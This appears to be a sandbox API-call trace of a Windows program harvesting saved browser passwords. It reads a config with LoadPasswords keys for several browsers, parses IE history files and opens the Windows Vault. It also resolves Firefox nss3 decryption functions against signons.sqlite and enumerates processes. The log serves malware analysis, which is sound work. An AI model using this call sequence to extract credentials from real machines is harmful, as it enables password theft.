Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ChromeProfileFolder False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = OperaPasswordFile False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = WinPos False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Columns False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = Sort, default_value = 0 True 1
Fn
System Get Info type = Operating System True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018062620180627\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 32, size_out = 32 True 1
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, type = size True 1
Fn
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 256, size_out = 256 True 1
Fn
Data
File Read filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat, size = 8, size_out = 8 True 92
Fn
Data
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes False 1
Fn
Module Load module_name = pstorec.dll, base_address = 0x6fe60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x6fe6526c True 1
Fn
Module Load module_name = vaultcli.dll, base_address = 0x70180000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultOpenVault, address_out = 0x701826a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultCloseVault, address_out = 0x70182718 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x70183099 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultFree, address_out = 0x70184321 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetInformation, address_out = 0x701824c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetItem, address_out = 0x70183242 True 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\history.dat, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite, type = file_attributes True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\places.sqlite, type = time True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/p7ap74gw.default True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path False 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Registry Open Key reg_name = Mozilla Firefox\bin False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Open Key reg_name = Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes True 1
Fn
Registry Enumerate Keys - False 1
Fn
Module Get Handle module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x0 False 1
Fn
Module Load module_name = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, base_address = 0x6ffc0000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7007d70b True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7007d13c True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x70013c51 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x70013333 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x6fffcbc4 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x6fffd3ca True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x700100a7 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\logins.json, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\signons.sqlite, type = file_attributes True 1
Fn
Registry Open Key reg_name = Mozilla Firefox\bin False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Open Key reg_name = Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes True 1
Fn
Registry Enumerate Keys - False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x6ffc0000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x70121ca0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x700ace70 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x70115200 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x700cd400 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x700cd3a0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x700cd3d0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x700f9f60 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x700fbde0 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x700fa270 True 1
Fn
Registry Open Key reg_name = Mozilla Firefox\bin False 1
Fn
Registry Enumerate Keys - True 1
Fn
Registry Open Key reg_name = Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox\nss3.dll, type = file_attributes True 1
Fn
Registry Enumerate Keys - False 1
Fn
Module Get Handle module_name = c:\program files (x86)\mozilla firefox\nss3.dll, base_address = 0x6ffc0000 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x7007d70b True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x7007d13c True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x70013c51 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x70013333 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x6fffcbc4 True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x6fffd3ca True 1
Fn
Module Get Address module_name = c:\program files (x86)\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x700100a7 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryFullProcessImageNameW, address_out = 0x75fd15f7 True 1
Fn
Process Get filename file_name = C:\Windows\System32\taskhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x75fdd60f True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Get filename file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Get filename file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Get filename file_name = C:\Windows\System32\conhost.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Program Files (x86)\Sea Monkey\nss3.dll, type = file_attributes False 1
Fn
